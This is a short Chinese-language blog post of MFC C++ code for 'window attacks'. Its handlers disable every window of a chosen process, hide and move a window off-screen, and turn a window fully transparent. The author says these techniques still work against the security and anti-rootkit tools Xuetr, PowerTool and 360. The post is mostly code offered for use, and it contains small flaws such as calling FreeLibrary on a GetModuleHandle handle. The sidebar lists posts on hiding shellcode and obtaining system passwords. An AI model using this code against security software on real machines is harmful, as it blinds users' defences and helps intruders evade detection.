窗口攻擊大法

原創

小驹

2020-06-16 09:06

窗口攻擊大法：

現在攻擊Xurte, powertool,360等都還有用。。

界面：

1.窗口失效

void CWindowAttackDlg::On_Ok() 
{
	// TODO: Add your control notification handler code here
	// TODO: Add extra validation here
	DWORD dwInputPID = GetDlgItemInt(IDC_EDT_pid);
	DWORD dwPID;
	for (int i = 10000; i < 9999999;i++)
	{
		GetWindowThreadProcessId((HWND)i, &dwPID);
		if ( (dwPID == dwInputPID) || (dwPID == 0))
		{
			::EnableWindow((HWND)i, 0);
		}
	}
}

2.窗口移動

void CWindowAttackDlg::OnOk2() 
{
	// TODO: Add your control notification handler code here
	WINDOWPLACEMENT stPlacement = {0};
	stPlacement.length = sizeof(WINDOWPLACEMENT);
	stPlacement.showCmd = SW_HIDE;
	stPlacement.ptMaxPosition.x = -12;
	stPlacement.ptMaxPosition.y = -12;

	stPlacement.ptMinPosition.x = -12;
	stPlacement.ptMinPosition.y = -12;
	stPlacement.rcNormalPosition.bottom = -12;
	stPlacement.rcNormalPosition.left = -12;
	stPlacement.rcNormalPosition.right = -12;
	stPlacement.rcNormalPosition.top = -12;

	DWORD dwHandle = GetDlgItemInt(IDC_EDT_pid2);


	::SetWindowPlacement((HWND)dwHandle, &stPlacement);

	::MoveWindow((HWND)dwHandle, -1, -1, 0, 0 , FALSE);
	::SetWindowPos((HWND)dwHandle,HWND_BOTTOM, -21, -12, 0, 0, SWP_HIDEWINDOW);
}

3. 窗口透明

typedef  BOOL  (__stdcall *pSetLayeredWindowAttributes) ( HWND hwnd, COLORREF crKey, BYTE bAlpha,DWORD dwFlags);

int ChangeNum(CString str,int length)     
{     
    char  revstr[16]={0};  //根據十六進制字符串的長度，這裏注意數組不要越界  
    int   num[16]={0};     
    int   count=1;     
    int   result=0;     
    strcpy(revstr,str);     
    for   (int i=length-1;i>=0;i--)     
    {     
        if ((revstr[i]>='0') && (revstr[i]<='9'))     
            num[i]=revstr[i]-48;//字符0的ASCII值爲48  
        else if ((revstr[i]>='a') && (revstr[i]<='f'))     
            num[i]=revstr[i]-'a'+10;     
        else if ((revstr[i]>='A') && (revstr[i]<='F'))     
            num[i]=revstr[i]-'A'+10;     
        else     
            num[i]=0;   
        result=result+num[i]*count;     
        count=count*16;//十六進制(如果是八進制就在這裏乘以8)      
    }     
    return result;     
}  


void CWindowAttackDlg::OnOk3() 
{
	// TODO: Add your control notification handler code here
	DWORD dwHwnd;
	CString strHwnd;
	GetDlgItemText(IDC_EDT_pid3, strHwnd);

	dwHwnd = ChangeNum(strHwnd, strHwnd.GetLength());

	DWORD dwExStyle = ::GetWindowLong((HWND)dwHwnd, GWL_EXSTYLE);
	::SetWindowLong((HWND)dwHwnd, GWL_EXSTYLE, dwExStyle | WS_EX_LAYERED);

	HMODULE hUser = GetModuleHandle("user32.dll");
	if (hUser == NULL)
	{
		AfxMessageBox("GetModuleHandle error");
		return ;
	}
		//SetLayeredWindowAttributes
	pSetLayeredWindowAttributes pMySetLayeredWindowAttributes;
	pMySetLayeredWindowAttributes = (pSetLayeredWindowAttributes)GetProcAddress(hUser, "SetLayeredWindowAttributes");
	pMySetLayeredWindowAttributes((HWND)dwHwnd, 0, 0, LWA_ALPHA);
	FreeLibrary(hUser);
}

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

窗口攻擊大法

Android啓動過程-萬字長文(Android14)

這種嵌套字典類型的數據，我想把它讀取到df裏，如何操作？

微調真的能讓LLM學到新東西嗎:引入新知識可能讓模型產生更多的幻覺

iNeuOS工業互聯網操作系統，增加電力IEC104協議

微服務實踐k8s&dapr開發部署實驗（3）訂閱發佈

kbgressdb之數據結構V0.2

增加節表存放shellcode

窗口攻擊大法

正則表達式匹配ip地址

獲得系統密碼（對windows 7無效）

API內存搜索引擎（C語言內嵌彙編）

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結